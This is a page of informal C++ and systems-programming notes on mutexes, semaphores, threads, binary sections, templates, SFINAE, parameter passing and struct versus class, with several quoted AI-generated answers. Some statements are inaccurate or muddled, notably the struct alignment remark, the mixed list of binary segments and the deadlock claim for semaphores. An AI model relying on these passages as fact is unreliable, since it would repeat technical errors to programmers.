OpenAI: A mutex is a type of lock used to synchronize access to a shared resource by multiple threads or processes. A semaphore is a variable or abstract data type used to control access to a common resource by multiple processes in a concurrent system such as a multitasking operating system.

Mutexes are typically used to protect a shared resource from simultaneous access by multiple threads. They are used to ensure that multiple threads do not simultaneously access the same shared resource. A mutex can be used to limit access to a single thread at a time.

Semaphores are used to limit access to a shared resource by multiple threads. They can be used to control access to a shared resource, or to synchronize access to the shared resource. Semaphores can also be used to control the execution of multiple threads within a single process. Semaphores can be used to prevent deadlock situations, where two threads are waiting for each other to finish before they can proceed.

See Mutex vs Semaphore.

This is getting into the weeds, but mutexes and the data they protect can happily be decalared consecutively in the code; so consider what this might mean when both mutex and data are in the same cache line.

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

OpenAI: Threads and processes are both used to execute tasks on a computer. A process is a program that is running on a computer that is independent of any other process. It contains its own memory space, variables, and resources. A thread is a sub-process within a process. It shares resources and memory with the parent process, and can run concurrently with other threads within the same process. Threads are more lightweight than processes as they don’t require as much system resources. However, processes are more reliable and secure than threads.

Thread bests practice

References


Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section Description
stack / Local variables
heap /\ Dynamic memory
.rodata Read-only data
.bss Uninitialised data
.data Initialised data
.text Code
  1. Header: The header contains information about the executable (e.g. its size, version, etc.).

  2. Code: The code segment contains the actual instructions to be executed.

  3. Data: The data segment contains static data which has been initialized and used by the code.

  4. Read/Write: The read/write segment contains data that can be modified by the code during runtime.

  5. Relocation: The relocation segment is used to adjust the code and data segments based on the image base address.

  6. Debug: The debug segment contains information that can be used to debug the program.

  7. Resources: The resources segment contains information about the executable such as icons, bitmaps, strings, and other data.

  8. Imports: The imports segment contains information about imported functions from external libraries.

  9. Exports: The exports segment contains information about functions that are exported from the executable. ___

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template Metaprogramming (TMP) is a powerful programming technique in C++ that enables developers to write code that performs operations at compile-time. It takes advantage of templates, which are a feature of C++ that allows code to be written in a generic form, so that it can be used for different types. This technique allows developers to write code that is executed by the compiler instead of the processor, enabling highly efficient code to be written. TMP is used in a wide variety of applications such as game development, graphics programming, and system programming. It is also often used in scientific computing and machine learning.

Templates are an important part of the C++ Standard Library. They are used to create generic classes and functions that can be used with any data type. For example, the Standard Template Library (STL) includes containers, algorithms, and iterators that work with all types of data. Templates allow developers to write code that is reusable and more efficient. They also enable the use of powerful generic programming techniques such as meta-programming and generic programming.

SFINAE

SFINAE stands for Substitution Failure Is Not An Error. It is a technique used in template programming in C++. It is used when a compiler is presented with a function template specialization and fails to match the specialization with the given template declaration, the compiler won’t produce an error, but will instead ignore the specialization. This allows for other template specializations to be used instead, and thus prevents compilation errors.


C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {
}

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.

void func(const big_type& p) {
}

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {
}

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {
}

class or struct?

The only difference between a class and a struct is the default access level: public, protected, private.

But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};